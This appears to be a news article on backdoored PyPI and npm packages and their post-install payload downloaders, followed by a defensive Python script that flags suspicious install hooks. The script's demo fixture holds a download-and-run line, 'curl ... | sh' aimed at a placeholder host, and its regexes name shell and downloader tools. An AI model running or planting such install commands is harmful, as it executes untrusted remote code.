Malicious Backdoors Found in Python and npm Packages Targeting Windows and Linux

In a new wave of supply chain attacks, security researchers have uncovered multiple backdoored open-source packages uploaded to PyPI (Python Package Index) and npm (Node Package Manager).

These packages are designed to target both Windows and Linux environments and have been carefully crafted to blend in with legitimate development tools. The discovery comes just as Microsoft pushes for centralized software updates across Windows devices—a move we recently explored here.

What Was Discovered?

According to a report by ReversingLabs, at least five malicious packages were found on PyPI and three on npm. These libraries contained stealthy backdoors capable of remote code execution, data exfiltration, and additional malware deployment. The attackers disguised the packages with names that closely resembled legitimate libraries, increasing the likelihood that developers would unknowingly install them.

Notably, these malicious packages were cross-platform, using specific code branches for Windows and Linux, demonstrating a higher level of sophistication compared to typical open-source threats.

How Do the Backdoors Work?

Once installed, the packages initiate a post-installation script that downloads a second-stage payload. This payload:

  • Establishes communication with a remote command-and-control (C2) server
  • Waits for instructions to execute arbitrary commands
  • Can download further malicious modules or steal sensitive data

The attackers used obfuscation techniques to hide the malicious code, and in some cases, delayed the execution to avoid detection during initial analysis.

A Growing Threat in the Software Supply Chain

This is not an isolated incident. The frequency of backdoored packages in open-source repositories has been increasing, raising alarms about the security of the software supply chain. Because developers often trust and rely on these repositories, a single compromised package can have far-reaching consequences, especially in enterprise environments.

Who Is Affected?

Developers and organizations using Python and Node.js should immediately audit their dependencies. Even if a backdoored package was only installed briefly, it could have introduced persistent threats into your environment.

The specific package names and hashes have been published by ReversingLabs, and the malicious libraries have since been removed. However, those who installed them before takedown may still be at risk.

What Can You Do?

  • Audit your dependencies regularly: Use tools like pip-audit, npm audit, or SBOM (Software Bill of Materials) generators to scan for known threats.
  • Pin versions and verify sources: Always verify the source of packages and avoid relying solely on name similarity.
  • Monitor unusual activity: Keep an eye out for unexpected network requests, particularly to unfamiliar IP addresses or domains.
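The post-installation hook described above is also the first place a dependency audit should look. The following is an added example, not code from the article or from ReversingLabs: it walks a node_modules tree, reads each package.json, and flags packages whose preinstall/install/postinstall scripts match downloader, shell-spawn, encoding or dynamic-eval patterns. The package names, manifests and indicator regexes are constructed for illustration and are heuristics, not the report's indicators.

```python
"""Flag npm packages whose install-time lifecycle scripts look like downloaders."""
import json
import os
import re
import tempfile
LIFECYCLE_HOOKS = ("preinstall", "install", "postinstall")
# (label, regex) indicators; labels and patterns are this example's own heuristics.
INDICATORS = [
    ("downloader", re.compile(r"\b(curl|wget|Invoke-WebRequest|iwr)\b", re.I)),
    ("shell-spawn", re.compile(r"(powershell|cmd\.exe|\|\s*(ba)?sh\b|bash -c)", re.I)),
    ("encoded-payload", re.compile(r"(base64|-EncodedCommand|atob\()", re.I)),
    ("dynamic-eval", re.compile(r"(\beval\(|new Function|child_process)")),
]

def score_script(script: str) -> list[str]:
    """Return the indicator labels matched by one lifecycle script string."""
    return [label for label, rx in INDICATORS if rx.search(script)]

def find_install_hooks(root: str) -> dict[str, dict[str, list[str]]]:
    """Map package name -> {hook: matched indicators} for every package.json under root."""
    findings: dict[str, dict[str, list[str]]] = {}
    for dirpath, _dirs, files in os.walk(root):
        if "package.json" not in files:
            continue
        try:
            with open(os.path.join(dirpath, "package.json"), encoding="utf-8") as fh:
                meta = json.load(fh)
        except (OSError, ValueError):
            continue  # unreadable or malformed manifest: skip it, keep auditing
        scripts = meta.get("scripts") or {}
        # Hooks with no indicator hits are kept (empty list) so a reviewer can eyeball them.
        hooks = {h: score_script(scripts[h]) for h in LIFECYCLE_HOOKS if h in scripts}
        if hooks:
            findings[meta.get("name", dirpath)] = hooks
    return findings

def demo() -> dict[str, dict[str, list[str]]]:
    """Audit a constructed node_modules tree of three fake packages (names invented)."""
    sample = {  # constructed manifests, not real packages from the report
        "left-pad-utils": {"build": "tsc"},
        "node-gyp-shim": {"postinstall": "node scripts/build-native.js"},
        "lodash-helperz": {"postinstall": "curl -fsSL http://example.invalid/stage2 | sh"},
    }
    with tempfile.TemporaryDirectory() as base:
        for name, scripts in sample.items():
            pkg_dir = os.path.join(base, "node_modules", name)
            os.makedirs(pkg_dir)
            with open(os.path.join(pkg_dir, "package.json"), "w", encoding="utf-8") as fh:
                json.dump({"name": name, "scripts": scripts}, fh)
        return find_install_hooks(base)
```

Packages without any install-time hook are skipped entirely, while a hook with no indicator hits is still reported with an empty list so it can be reviewed by hand.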

Final Thoughts

This incident reinforces the importance of securing every link in the development pipeline. From open-source repositories to update mechanisms, vigilance is essential. As companies like Microsoft work to unify and secure update processes, developers and organizations must do their part by practicing rigorous dependency hygiene.

For further technical analysis and details, read the full report on HackRead.
